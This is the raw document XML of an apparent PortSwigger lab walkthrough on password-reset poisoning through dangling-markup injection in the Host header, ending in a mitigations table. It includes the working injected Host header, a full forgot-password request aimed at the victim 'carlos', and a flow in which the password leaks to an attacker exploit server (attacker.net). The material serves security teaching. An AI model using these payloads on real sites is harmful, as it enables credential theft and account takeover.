            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: YOUR-LAB-ID.web-security-academy.net:'&lt;a href="//YOUR-EXPLOIT-SERVER.exploit-server.net/?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Breaking down what this does:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The single quote (') terminates the existing HTML attribute string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The &gt; closes the existing tag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The &lt;a href="// opens a new anchor tag with an href pointing to our server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The trailing ? begins a query string — everything after it (including the new password) becomes the URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Test on Your Own Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep username=wiener in the POST body but use the dangling markup Host header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request from Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the exploit server and open the Access Log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see an entry like: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after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /?/login'&gt;[new-password-here] HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: YOUR-EXPLOIT-SERVER.exploit-server.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm the password appears in the log entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Attack Carlos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Burp Repeater, change the username parameter to carlos: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after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /forgot-password HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: YOUR-LAB-ID.web-security-academy.net:'&lt;a href="//YOUR-EXPLOIT-SERVER.exploit-server.net/?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">username=carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh the exploit server access log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the GET request made on behalf of Carlos's email client — extract the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 — Log In as Carlos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the login page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter carlos as the username and the stolen password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully log in. Lab solved!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  1. Sends POST /forgot-password with poisoned Host header (username=carlos)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  2. Generates new password for carlos and emails it</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  3. Embeds Host header value (unescaped) inside the email HTML</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Carlos' Email Client</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  4. Opens email; dangling &lt;a href="//attacker.net/? slurps up the password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  5. Browser sends GET /?/login'&gt;[carlos-password] to attacker server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="999999"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         v</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker's Exploit Server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  6. Access log records the request — password is extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations &amp;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Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate Host Header</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Whitelist allowed host values server-side; reject any request with an unknown or malformed Host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcode Reset URLs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Never construct password reset URLs from user-supplied headers. Use a configured base URL from server-side config.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HTML-Encode Email Content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Escape all dynamic values inserted into email HTML, especially those from request headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Token-Based Resets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Send a time-limited, single-use token URL rather than a plaintext new password in the email.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
